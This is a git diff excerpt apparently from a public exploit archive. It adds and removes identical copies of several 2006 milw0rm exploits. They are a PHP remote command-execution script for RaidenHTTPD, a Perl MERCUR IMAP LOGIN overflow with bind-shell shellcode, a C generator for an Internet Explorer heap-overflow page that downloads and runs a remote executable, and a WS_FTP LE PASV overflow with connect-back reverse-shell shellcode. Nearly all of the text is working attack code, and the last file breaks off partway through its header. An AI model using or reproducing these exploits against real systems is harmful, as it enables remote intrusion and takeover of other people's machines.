-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Accept: text/plain\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"my_delim")){
-echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]);
-}
-echo "exploit failed...";
-
-?>
-
-# milw0rm.com [2006-09-08]
+#!/usr/bin/php -q -d short_open_tag=on
+ 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$cmd="";
+$port=80;
+$proxy="";
+for ($i=2; $i<$argc; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+if ($proxy=='') {$p="/";} else {$p='http://'.$host.':'.$port."/";}
+
+$data ="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"SoftParserFileXml\"; filename=\"suntzu\";\r\n";
+$data.="Content-Type: image/jpeg;\r\n\r\n";
+$data.="\r\n";
+$data.="-----------------------------7d529a1d23092a--\r\n";
+$packet ="POST ".$p."raidenhttpd-admin/slice/check.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="SUNTZU: $cmd\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Accept: text/plain\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"my_delim")){
+echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]);
+}
+echo "exploit failed...";
+
+?>
+
+# milw0rm.com [2006-09-08]
diff --git a/platforms/windows/remote/2345.pl b/platforms/windows/remote/2345.pl
index 71ae0d4d5..b0585166c 100755
--- a/platforms/windows/remote/2345.pl
+++ b/platforms/windows/remote/2345.pl
@@ -1,96 +1,96 @@
-#!/usr/bin/perl
-# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
-# Perl script based on Sami FTP server remote exploit by Critical Security
-# http://www.securityfocus.com/bid/17138
-# acaro [at] jervus.it
-
-
-use IO::Socket::INET;
-use Switch;
-
-if (@ARGV < 2) {
-print "--------------------------------------------------------------------\n";
-print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n";
-print " Return address: \n";
-print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n";
-print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n";
-print " If values not specified, Windows 2k Sp4 will be used.\n";
-print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n";
-print "--------------------------------------------------------------------\n";
-}
-
-my $host =   "127.0.0.1";  
-
-my $port = 143;
-my $reply;
-my $request;
-my $pad = "\x90"x268;
-my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4
-
-
-foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$eip = $1 if ($_=~/-o(.*)/);
-}
-
-switch ($eip) {
-case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version
-case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version
-}
-
-#Metasploit bind 4444 shellcode
-my $shellcode=
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
-"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
-"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" .
-"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" .
-"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" .
-"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" .
-"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" .
-"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" .
-"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" .
-"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" .
-"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" .
-"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" .
-"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" .
-"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" .
-"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" .
-"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" .
-"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" .
-"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" .
-"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" .
-"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" .
-"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" .
-"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" .
-"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" .
-"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" .
-"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" .
-"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" .
-"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";
-
-
-
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
-
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
-
-send $socket, $exploit, 0;
-print "[+] sending 1st chunk\n";
-
-$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
-
-send $socket, $exploit, 0;
-print "[+] sending 2nd chunk\n";
-
-print " + connecting port 4444 of $host ...\n";
-system("telnet $host 4444");
-
-close $socket;
-exit;
-
-# milw0rm.com [2006-09-11]
+#!/usr/bin/perl
+# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
+# Perl script based on Sami FTP server remote exploit by Critical Security
+# http://www.securityfocus.com/bid/17138
+# acaro [at] jervus.it
+
+
+use IO::Socket::INET;
+use Switch;
+
+if (@ARGV < 2) {
+print "--------------------------------------------------------------------\n";
+print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n";
+print " Return address: \n";
+print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n";
+print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n";
+print " If values not specified, Windows 2k Sp4 will be used.\n";
+print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n";
+print "--------------------------------------------------------------------\n";
+}
+
+my $host =   "127.0.0.1";  
+
+my $port = 143;
+my $reply;
+my $request;
+my $pad = "\x90"x268;
+my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4
+
+
+foreach (@ARGV) {
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$eip = $1 if ($_=~/-o(.*)/);
+}
+
+switch ($eip) {
+case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version
+case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version
+}
+
+#Metasploit bind 4444 shellcode
+my $shellcode=
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
+"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
+"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" .
+"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" .
+"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" .
+"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" .
+"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" .
+"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" .
+"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" .
+"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" .
+"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" .
+"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" .
+"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" .
+"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" .
+"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" .
+"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" .
+"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" .
+"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" .
+"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" .
+"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" .
+"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" .
+"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" .
+"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" .
+"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" .
+"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" .
+"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" .
+"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";
+
+
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";
+
+send $socket, $exploit, 0;
+print "[+] sending 1st chunk\n";
+
+$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";
+
+send $socket, $exploit, 0;
+print "[+] sending 2nd chunk\n";
+
+print " + connecting port 4444 of $host ...\n";
+system("telnet $host 4444");
+
+close $socket;
+exit;
+
+# milw0rm.com [2006-09-11]
diff --git a/platforms/windows/remote/2358.c b/platforms/windows/remote/2358.c
index cf5d04912..649104408 100755
--- a/platforms/windows/remote/2358.c
+++ b/platforms/windows/remote/2358.c
@@ -1,174 +1,174 @@
-/*
-*-----------------------------------------------------------------------
-*
-* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
-* !!! 0day !!!  Public Version !!!
-*
-* Copyright (C) 2006 XSec All Rights Reserved.
-*
-* Author   : nop
-*          : nop#xsec.org
-*          : http://www.xsec.org
-*          :
-* Tested   : Windows 2000 Server SP4 CN
-*          :     + Internet Explorer 6.0 SP1
-*          : Windows XP SP2 CN
-*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
-*          :
-* Complie  : cl daxctle2.c
-*          :
-* Usage       :d:\>daxctle2
-*          :
-*          :Usage: daxctle  [htmlfile]
-*          :
-*          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
-*          :
-*          
-*------------------------------------------------------------------------
-*/
-
-#include 
-#include 
-
-FILE *fp = NULL;
-char *file = "xsec.htm";
-char *url = NULL;
-
-// Download Exec Shellcode by nop
-unsigned char sc[] =     
-"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
-"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
-"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
-"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04"
-"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33"
-"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08"
-"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b"
-"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10"
-"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7"
-"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b"
-"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e"
-"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f"
-"\x70";    
-
-char * header =
-"\n"
-"\n"
-"XSec.org\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n";
-
-// print unicode shellcode
-void PrintUc(char *lpBuff, int buffsize)
-{
-   int i,j;
-   char *p;
-   char msg[4];
-
-   for(i=0;i [htmlfile]\r\n\n", argv[0]);
-       exit(1);
-   }
-   
-   url = argv[1];
-   
-   //if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
-        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
-        {
-            //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n");
-            printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-            return;                
-        }
-
-      printf("[+] download url:%s\n", url);
-      
-      if(argc >=3) file = argv[2];
-      printf("[+] exploit file:%s\n", file);
-       
-   fp = fopen(file, "w");
-   if(!fp)
-   {
-       printf("[-] Open file error!\n");
-          return;
-   }    
-   
-   // print html header
-   fprintf(fp, "%s", header);
-   fflush(fp);
-   
-   // print shellcode
-   memset(buf, 0, sizeof(buf));
-   sc_len = sizeof(sc)-1;
-   memcpy(buf, sc, sc_len);
-   memcpy(buf+sc_len, url, strlen(url));
-   
-   sc_len += strlen(url)+1;
-   PrintUc(buf, sc_len);
- 
-   // print html footer
-   fprintf(fp, "%s", footer);
-   fflush(fp);  
-   
-   printf("[+] exploit write to %s success!\n", file);
-}
-
-// milw0rm.com [2006-09-13]
+/*
+*-----------------------------------------------------------------------
+*
+* daxctle2.c - Internet Explorer COM Object Heap Overflow Download Exec Exploit
+* !!! 0day !!!  Public Version !!!
+*
+* Copyright (C) 2006 XSec All Rights Reserved.
+*
+* Author   : nop
+*          : nop#xsec.org
+*          : http://www.xsec.org
+*          :
+* Tested   : Windows 2000 Server SP4 CN
+*          :     + Internet Explorer 6.0 SP1
+*          : Windows XP SP2 CN
+*          :     + Internet Explorer 6.0 SP1 (You need some goodluck! :-)
+*          :
+* Complie  : cl daxctle2.c
+*          :
+* Usage       :d:\>daxctle2
+*          :
+*          :Usage: daxctle  [htmlfile]
+*          :
+*          :d:\>daxctle2 http://xsec.org/xxx.exe xxx.htm
+*          :
+*          
+*------------------------------------------------------------------------
+*/
+
+#include 
+#include 
+
+FILE *fp = NULL;
+char *file = "xsec.htm";
+char *url = NULL;
+
+// Download Exec Shellcode by nop
+unsigned char sc[] =     
+"\xe9\xa3\x00\x00\x00\x5f\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b"
+"\x70\x1c\xad\x8b\x68\x08\x8b\xf7\x6a\x04\x59\xe8\x43\x00\x00\x00"
+"\xe2\xf9\x68\x6f\x6e\x00\x00\x68\x75\x72\x6c\x6d\x54\xff\x16\x95"
+"\xe8\x2e\x00\x00\x00\x83\xec\x20\x8b\xdc\x6a\x20\x53\xff\x56\x04"
+"\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33"
+"\xc0\x50\x50\x53\x57\x50\xff\x56\x10\x8b\xdc\x50\x53\xff\x56\x08"
+"\xff\x56\x0c\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56\x8b"
+"\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe\x10"
+"\x3a\xd6\x74\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xf1\x3b\x1f\x75\xe7"
+"\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b"
+"\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x58\xff\xff\xff\x8e\x4e\x0e"
+"\xec\xc1\x79\xe5\xb8\x98\xfe\x8a\x0e\xef\xce\xe0\x60\x36\x1a\x2f"
+"\x70";    
+
+char * header =
+"\n"
+"\n"
+"XSec.org\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n";
+
+// print unicode shellcode
+void PrintUc(char *lpBuff, int buffsize)
+{
+   int i,j;
+   char *p;
+   char msg[4];
+
+   for(i=0;i [htmlfile]\r\n\n", argv[0]);
+       exit(1);
+   }
+   
+   url = argv[1];
+   
+   //if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 60)
+        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
+        {
+            //printf("[-] Invalid url. Must start with 'http://','ftp://' and < 60 bytes.\n");
+            printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+            return;                
+        }
+
+      printf("[+] download url:%s\n", url);
+      
+      if(argc >=3) file = argv[2];
+      printf("[+] exploit file:%s\n", file);
+       
+   fp = fopen(file, "w");
+   if(!fp)
+   {
+       printf("[-] Open file error!\n");
+          return;
+   }    
+   
+   // print html header
+   fprintf(fp, "%s", header);
+   fflush(fp);
+   
+   // print shellcode
+   memset(buf, 0, sizeof(buf));
+   sc_len = sizeof(sc)-1;
+   memcpy(buf, sc, sc_len);
+   memcpy(buf+sc_len, url, strlen(url));
+   
+   sc_len += strlen(url)+1;
+   PrintUc(buf, sc_len);
+ 
+   // print html footer
+   fprintf(fp, "%s", footer);
+   fflush(fp);  
+   
+   printf("[+] exploit write to %s success!\n", file);
+}
+
+// milw0rm.com [2006-09-13]
diff --git a/platforms/windows/remote/2401.c b/platforms/windows/remote/2401.c
index 7b84ecf37..41614d553 100755
--- a/platforms/windows/remote/2401.c
+++ b/platforms/windows/remote/2401.c
@@ -1,185 +1,185 @@
-/*
-ws_exp.c
-WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
-Coded by h07 
-Tested on XP SP2 Polish, 2000 SP4 Polish
-Example:
-
-C:\>ws_exp 1 192.168.0.1 4444
-
-[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
-[*] Coded by h07 
-[+] Listening on 21
-[+] Connection accepted from 192.168.0.3
-[+] Client request: USER h07
-[+] Client request: PWD
-[+] Client request: SYST
-[+] Client request: HELP
-[+] Client request: PASV
-[+] Sending buffer: OK
-[*] Press enter to quit
-
-C:\>nc -v -l -p 4444
-listening on [any] 4444 ...
-connect to [192.168.0.1] from (UNKNOWN) [192.168.0.3] 2809: NO_DATA
-Microsoft Windows 2000 [Wersja 5.00.2195]
-(C) Copyright 1985-2000 Microsoft Corp.
-
-C:\Program Files\WS_FTP>
-*/
-
-#include 
-#define PORT 21
-#define BUFF_SIZE 1024
-#define RESPONSE "200 blah blah\r\n"
-
-typedef struct
- {
- char os_name[32];
- unsigned long ret;
- } target;
-
-char shellcode[] =
-/*
-win32 reverse shellcode (thx metasploit.com)
-bad chars: 0x00 0x20 0x0a 0x0d 0x28 0x29
-*/
-"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x87"
-"\x61\xbc\xd8\x83\xeb\xfc\xe2\xf4\x7b\x0b\x57\x95\x6f\x98\x43\x27"
-"\x78\x01\x37\xb4\xa3\x45\x37\x9d\xbb\xea\xc0\xdd\xff\x60\x53\x53"
-"\xc8\x79\x37\x87\xa7\x60\x57\x91\x0c\x55\x37\xd9\x69\x50\x7c\x41"
-"\x2b\xe5\x7c\xac\x80\xa0\x76\xd5\x86\xa3\x57\x2c\xbc\x35\x98\xf0"
-"\xf2\x84\x37\x87\xa3\x60\x57\xbe\x0c\x6d\xf7\x53\xd8\x7d\xbd\x33"
-"\x84\x4d\x37\x51\xeb\x45\xa0\xb9\x44\x50\x67\xbc\x0c\x22\x8c\x53"
-"\xc7\x6d\x37\xa8\x9b\xcc\x37\x98\x8f\x3f\xd4\x56\xc9\x6f\x50\x88"
-"\x78\xb7\xda\x8b\xe1\x09\x8f\xea\xef\x16\xcf\xea\xd8\x35\x43\x08"
-"\xef\xaa\x51\x24\xbc\x31\x43\x0e\xd8\xe8\x59\xbe\x06\x8c\xb4\xda"
-"\xd2\x0b\xbe\x27\x57\x09\x65\xd1\x72\xcc\xeb\x27\x51\x32\xef\x8b"
-"\xd4\x22\xef\x9b\xd4\x9e\x6c\xb0\x87\x61\xbc\xd8\xe1\x09\xbc\xd8"
-"\xe1\x32\x35\x39\x12\x09\x50\x21\x2d\x01\xeb\x27\x51\x0b\xac\x89"
-"\xd2\x9e\x6c\xbe\xed\x05\xda\xb0\xe4\x0c\xd6\x88\xde\x48\x70\x51"
-"\x60\x0b\xf8\x51\x65\x50\x7c\x2b\x2d\xf4\x35\x25\x79\x23\x91\x26"
-"\xc5\x4d\x31\xa2\xbf\xca\x17\x73\xef\x13\x42\x6b\x91\x9e\xc9\xf0"
-"\x78\xb7\xe7\x8f\xd5\x30\xed\x89\xed\x60\xed\x89\xd2\x30\x43\x08"
-"\xef\xcc\x65\xdd\x49\x32\x43\x0e\xed\x9e\x43\xef\x78\xb1\xd4\x3f"
-"\xfe\xa7\xc5\x27\xf2\x65\x43\x0e\x78\x16\x40\x27\x57\x09\x4c\x52"
-"\x83\x3e\xef\x27\x51\x9e\x6c\xd8";
-
-char buffer[BUFF_SIZE];
-
-target list[] =
- {
- "XP SP2 Polish",
- 0x7d16887b, //JMP ESI
-
- "2000 SP4 Polish",
- 0x776f2015, //JMP ESI
-
- "XP SP2 English",
- 0x7cb9e082, //JMP ESI
-
- "2000 SP4 English",
- 0x7848a5f1, //JMP ESI
-
- "XP SP2 German",
- 0x7ca96834  //JMP ESI
- };
-
-void config_shellcode(unsigned long ip, unsigned short port)
- {
- memcpy(&shellcode[184], &ip, 4);
- memcpy(&shellcode[190], &port, 2);
- }
-
-int main(int argc, char *argv[])
-{
-WSADATA wsa;
-int sock, cl, len, os, r_len, i,
-a = (sizeof(list) / sizeof(target)) - 1;
-unsigned long connectback_IP, eip;
-unsigned short connectback_port;
-struct sockaddr_in server, client;
-
-printf("\n[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit\n");
-printf("[*] Coded by h07 \n");
-
-if(argc < 4)
- {
- printf("[*] Usage: %s   \n", argv[0]);
- printf("[*] Sample: %s 0 192.168.0.1 4444\n", argv[0]);
- printf("[*] Systems..\n");
- for(i = 0; i <= a; i++)
- printf("[>] %d: %s\n", i, list[i].os_name);
- return 1;
- }
-
-WSAStartup(MAKEWORD(2, 0), &wsa);
-
-os = atoi(argv[1]);
-
-if((os < 0) || (os > a))
- {
- printf("[-] Error: unknown target %d\n", os);
- return -1;
- }
-
-eip = list[os].ret;
-connectback_IP = inet_addr(argv[2]) ^ (ULONG)0xd8bc6187;
-connectback_port = htons(atoi(argv[3])) ^ (USHORT)0xd8bc;
-config_shellcode(connectback_IP, connectback_port);
-
-if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
- {
- printf("[-] Socket error\n");
- return -1;
- }
-
-server.sin_family = AF_INET;
-server.sin_addr.s_addr = htonl(INADDR_ANY);
-server.sin_port = htons(PORT);
-
-bind(sock, (struct sockaddr *) &server, sizeof(server));
-listen(sock, 1);
-
-printf("[+] Listening on %d\n", PORT);
-
-len = sizeof(client);
-cl = accept(sock, (struct sockaddr *) &client, &len);
-
-printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr));
-
-send(cl, "200 evil server ready :>\r\n", 26, 0);
-
-for(i = 0; i <= 3; i++)
- {
- memset(buffer, 0x00, BUFF_SIZE);
- recv(cl, buffer, BUFF_SIZE - 1, 0);
- printf("[+] Client request: %s", buffer);
- send(cl, RESPONSE, strlen(RESPONSE), 0);
- }
-
-//PASV request
-memset(buffer, 0x00, BUFF_SIZE);
-recv(cl, buffer, BUFF_SIZE - 1, 0);
-printf("[+] Client request: %s", buffer);
-
-//PASV response
-r_len = 1011;
-memset(buffer, 0x90, BUFF_SIZE);
-memcpy(buffer, "200 \x31\xc0", 6);
-memcpy(buffer + 6, shellcode, sizeof(shellcode) - 1);
-*((unsigned long*)(&buffer[r_len])) = eip;
-memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
-
-if(send(cl, buffer, strlen(buffer), 0) != -1)
-printf("[+] Sending buffer: OK\n");
-else
-printf("[-] Sending buffer: failed\n");
-
-printf("[*] Press enter to quit\n");
-getchar();
-
-return 0;
-}
-
-// milw0rm.com [2006-09-20]
+/*
+ws_exp.c
+WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
+Coded by h07 
+Tested on XP SP2 Polish, 2000 SP4 Polish
+Example:
+
+C:\>ws_exp 1 192.168.0.1 4444
+
+[*] WS_FTP LE 5.08 (PASV response) 0day buffer overflow exploit
+[*] Coded by h07 
